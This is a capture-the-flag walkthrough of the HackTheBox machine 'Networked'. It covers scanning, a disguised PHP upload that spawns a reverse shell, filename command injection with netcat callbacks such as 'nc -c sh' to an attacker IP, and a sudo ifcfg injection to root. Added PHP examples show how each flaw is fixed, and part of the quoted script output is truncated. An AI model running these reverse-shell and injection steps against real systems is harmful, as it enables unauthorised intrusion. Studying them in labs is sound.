NETWORKED (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.146
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-17 03:47 GMT
Nmap scan report for 10.10.10.146
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https
Aggressive OS guesses: Linux 3.10 - 4.11 (94%), HP P2000 G3 NAS device (91%), Linux 3.2 - 4.9 (91%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 - 4.6 (90%), Linux 4.10 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Asus RT-AC66U WAP (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 212.99 ms 10.10.14.1
2 213.15 ms 10.10.10.146

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.91 seconds

root@kali:~/Downloads# gobuster dir -u 10.10.10.146 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.146
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/11/17 03:59:42 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/backup (Status: 301)
/cgi-bin/ (Status: 403)
/index.php (Status: 200)
/uploads (Status: 301)
===============================================================
2019/11/17 04:01:27 Finished
===============================================================

root@kali:~/Downloads# gobuster dir -u 10.10.10.146 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.146
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/11/17 04:02:21 Starting gobuster
===============================================================
/index.php (Status: 200)
/.htaccess (Status: 403)
/. (Status: 200)
/upload.php (Status: 200)
/.html (Status: 403)
/photos.php (Status: 200)
[ERROR] 2019/11/17 04:03:07 [!] Get http://10.10.10.146/details.asp: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:10 [!] Get http://10.10.10.146/finish.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:10 [!] Get http://10.10.10.146/go.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:10 [!] Get http://10.10.10.146/index_new.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:10 [!] Get http://10.10.10.146/frontpage.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:11 [!] Get http://10.10.10.146/notify.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:11 [!] Get http://10.10.10.146/jtl.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:11 [!] Get http://10.10.10.146/list.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:11 [!] Get http://10.10.10.146/msg.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:11 [!] Get http://10.10.10.146/invoice.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/.htpasswd (Status: 403)
[ERROR] 2019/11/17 04:03:17 [!] Get http://10.10.10.146/orderterms.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/.htm (Status: 403)
/.htpasswds (Status: 403)
/.htgroup (Status: 403)
/.htaccess.bak (Status: 403)
/lib.php (Status: 200)
/.htuser (Status: 403)
/.ht (Status: 403)
/.htc (Status: 403)
===============================================================
2019/11/17 04:09:22 Finished
===============================================================

Of note, running these commands found:

/uploads (Status: 301)
/upload.php (Status: 200)
/photos.php (Status: 200)

Now browse to the two PHP pages:

http://10.10.10.146/upload.php

http://10.10.10.146/photos.php

root@kali:~/Downloads# cat shell.php

Now upload the file, intercepting the request and changing the filename and content type to:

filename="shell.php.gif"
Content-Type: image/gif

and add the GIF magic header as the first line of the file body:

GIF89a;

Then forward the request.

The file is uploaded.

Now refresh the page

http://10.10.10.146/photos.php

and on the terminal where we are listening we get the shell:

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:47488.
Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
05:47:55 up 3:21, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$

sh-4.2$ pwd
/
pwd
sh-4.2$ cd /home/guly
cd /home/guly
sh-4.2$ ls -la
ls -la
total 28
drwxr-xr-x. 3 guly guly 171 Nov 17 04:29 .
drwxr-xr-x. 3 root root 18 Jul 2 13:27 ..
lrwxrwxrwx. 1 root root 9 Jul 2 13:35 .bash_history -> /dev/null
-rw-r--r--. 1 guly guly 18 Oct 30 2018 .bash_logout
-rw-r--r--. 1 guly guly 193 Oct 30 2018 .bash_profile
-rw-r--r--. 1 guly guly 231 Oct 30 2018 .bashrc
drwxrwxr-x 2 guly guly 29 Nov 17 04:32 .ssh
-rw------- 1 guly guly 639 Jul 9 13:40 .viminfo
-r--r--r--. 1 root root 782 Oct 30 2018 check_attack.php
-rw-r--r-- 1 root root 44 Oct 30 2018 crontab.guly
-r--------. 1 guly guly 33 Oct 30 2018 user.txt

sh-4.2$ cat crontab.guly
cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php

sh-4.2$ cat /home/guly/check_attack.php
cat /home/guly/check_attack.php
$value) {
    $msg='';
    if ($value == 'index.html') {
        continue;
    }
    #echo "-------------\n";

    #print "check: $value\n";
    list ($name,$ext) = getnameCheck($value);
    $check = check_ip($name,$value);

    if (!($check[0])) {
        echo "attack!\n";
        # todo: attach file
        file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

        exec("rm -f $logpath");
        exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
        echo "rm -f $path$value\n";
        mail($to, $msg, $msg, $headers, "-F$value");
    }
}

?>

sh-4.2$ cd /var/www/html/uploads
cd /var/www/html/uploads
sh-4.2$ touch "test.txt"
touch "test.txt"

sh-4.2$ php /home/guly/check_attack.php
php /home/guly/check_attack.php
attack!
/bin/rm: cannot remove ‘/var/www/html/uploads/’: Is a directory
Ncat: Connection timed out.
rm -f /var/www/html/uploads/;nc -c bash 10.10.14.122 9001;.php
WARNING: RunAsUser for MSP ignored, check group ids (egid=48, want=51)
can not chdir(/var/spool/clientmqueue/): Permission denied
Program mode requires special privileges, e.g., root or TrustedUser.
attack!
/bin/rm: cannot remove ‘/var/www/html/uploads/’: Is a directory
Ncat: Connection refused.
rm -f /var/www/html/uploads/;nc -c bash 10.10.14.77 4444;

WARNING: RunAsUser for MSP ignored, check group ids (egid=48, want=51)
can not chdir(/var/spool/clientmqueue/): Permission denied
Program mode requires special privileges, e.g., root or TrustedUser.
attack!
/bin/rm: cannot remove ‘/var/www/html/uploads/’: Is a directory
Ncat: Connection timed out.
rm -f /var/www/html/uploads/;nc -c bash 10.10.15.147 4321

WARNING: RunAsUser for MSP ignored, check group ids (egid=48, want=51)
can not chdir(/var/spool/clientmqueue/): Permission denied
Program mode requires special privileges, e.g., root or TrustedUser.
attack!
/bin/rm: cannot remove ‘/var/www/html/uploads/’: Is a directory
rm -f /var/www/html/uploads/;nc -c bash 10.10.15.147 6666
WARNING: RunAsUser for MSP ignored, check group ids (egid=48, want=51)
can not chdir(/var/spool/clientmqueue/): Permission denied
Program mode requires special privileges, e.g., root or TrustedUser.
attack!
rm -f /var/www/html/uploads/dir
attack!
rm -f /var/www/html/uploads/test.txt
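The command injection demonstrated above exists because check_attack.php builds a shell command line from each filename it finds in the uploads directory, so a name containing ; runs a second command as guly on the next cron tick. The following is an added example, not the box's own code, of how that deletion step can be written so the filename never reaches a shell; $path is assumed to be the uploads directory exactly as in the original script.

```php
<?php
// Added example, not the box's own code: a safe replacement for the
// deletion step of check_attack.php. The original line
//   exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
// hands an attacker-chosen filename to /bin/sh, so a name such as
// "fooo; nc -c sh ..." runs nc as the cron user.
// $path is assumed to be the uploads directory, as in the original.

function remove_upload_safely(string $path, string $value): bool {
    // Accept only a bare filename: no slashes, no '.' or '..', so the entry
    // cannot point outside $path. Shell metacharacters in the name no
    // longer matter because no shell is involved below.
    if ($value !== basename($value) || $value === '.' || $value === '..') {
        error_log('check_attack: refusing entry ' . bin2hex($value));
        return false;
    }
    $full = $path . $value;
    // Delete regular files only; is_link() comes first because is_file()
    // follows symlinks and a planted link could point at another file.
    if (is_link($full) || !is_file($full)) {
        return false;
    }
    // unlink() takes a path, never a command line, so nothing is parsed.
    return unlink($full);
}

// If a shell really were unavoidable, the minimum would be
//   exec('nohup /bin/rm -f ' . escapeshellarg($path . $value) . ' ...');
// but unlink() above removes the shell from the picture entirely.

// Demonstration with a constructed name of the kind seen in the log above.
$demoDir = sys_get_temp_dir() . '/uploads_demo/';
if (!is_dir($demoDir)) { mkdir($demoDir); }
$evil = 'fooo; nc -c sh 10.10.14.135 5555';
touch($demoDir . $evil);
echo remove_upload_safely($demoDir, $evil) ? "removed\n" : "kept\n";
echo file_exists($demoDir . $evil) ? "still there\n" : "gone\n";
rmdir($demoDir);
```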

sh-4.2$ cat /etc/httpd/conf.d/php.conf
cat /etc/httpd/conf.d/php.conf
AddHandler php5-script .php
AddType text/html .php
DirectoryIndex index.php
php_value session.save_handler "files"
php_value session.save_path "/var/lib/php/session"
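The upload bypass above works because upload.php is satisfied by a name ending in .gif and a body starting with GIF89a, while the AddHandler php5-script .php line in php.conf makes Apache treat any file with .php anywhere in its extension chain, shell.php.gif included, as a PHP script. The following is an added example, not the box's upload.php (whose source is not shown), of a check that refuses that combination: one allow-listed extension only, magic bytes matched against that extension, and a server-chosen stored name.

```php
<?php
// Added example, not the box's upload.php (its source is not shown):
// a stricter check that refuses the "shell.php.gif" + "GIF89a;" trick.

// Magic bytes each allowed extension must start with.
const MAGIC = [
    'gif' => ["GIF87a", "GIF89a"],
    'png' => ["\x89PNG\r\n\x1a\n"],
    'jpg' => ["\xFF\xD8\xFF"],
];

// Returns null if the upload is acceptable, otherwise the reason to refuse.
// $clientName is the filename from the request; $bytes is the file body.
// The Content-Type header is deliberately ignored: the client controls it.
function reject_reason(string $clientName, string $bytes): ?string {
    // Exactly one extension. "shell.php.gif" has two and is refused here no
    // matter what the body holds; with "AddHandler php5-script .php" Apache
    // would otherwise run it as PHP because .php appears in the chain.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,4})$/', $clientName, $m)) {
        return 'name must be one word plus one extension';
    }
    $ext = strtolower($m[1]);
    if ($ext === 'jpeg') { $ext = 'jpg'; }
    if (!array_key_exists($ext, MAGIC)) {
        return "extension .$ext not allowed";
    }
    // Magic bytes must match the declared type, not merely look like an image.
    $matches = false;
    foreach (MAGIC[$ext] as $sig) {
        if (strncmp($bytes, $sig, strlen($sig)) === 0) { $matches = true; }
    }
    if (!$matches) {
        return 'content does not match declared type';
    }
    // A valid image header followed by PHP tags is still refused.
    if (stripos($bytes, '<?php') !== false || strpos($bytes, '<?=') !== false) {
        return 'embedded PHP tag';
    }
    return null;
}

// Store under a server-chosen name so the client's name never reaches disk.
function stored_name(string $ext): string {
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

// Constructed inputs: the writeup's bypass and a legitimate GIF.
var_dump(reject_reason('shell.php.gif', "GIF89a;<?php /* ... */ ?>"));
var_dump(reject_reason('photo.gif', "GIF89a\x01\x00\x01\x00"));
```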

root@kali:~/Downloads# nc -lvnp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555

on previous shell

sh-4.2$ touch 'fooo; nc -c sh 10.10.14.135 5555'
touch 'fooo; nc -c sh 10.10.14.135 5555'

After waiting up to 3 minutes (the cron interval) our netcat listener got a connection back as the user guly:

root@kali:~/Downloads# nc -lvnp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:51954.

id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
cat user.txt
526cfc2305f17XXXXXXXXXXXXXXXXXXXXXX

sudo -l
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh

The /usr/local/sbin/changename.sh script does the following:

cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0

It asks us to fill in four variables, writes them into a network interface configuration file and then runs /sbin/ifup to bring up that device. The regexp allows spaces, and the ifcfg file is sourced as shell by the network scripts, so a value such as xx sh is split into the assignment NAME=xx followed by the command sh, which runs with root privileges. By passing in xx sh as one of the variables we get a root shell:

sudo /usr/local/sbin/changename.sh

interface NAME:
xx sh

interface PROXY_METHOD:
x

interface BROWSER_ONLY:
x

interface BOOTPROTO:
x

id
uid=0(root) gid=0(root) groups=0(root)

cat /root/root.txt
0a8ecda83f1d812XXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT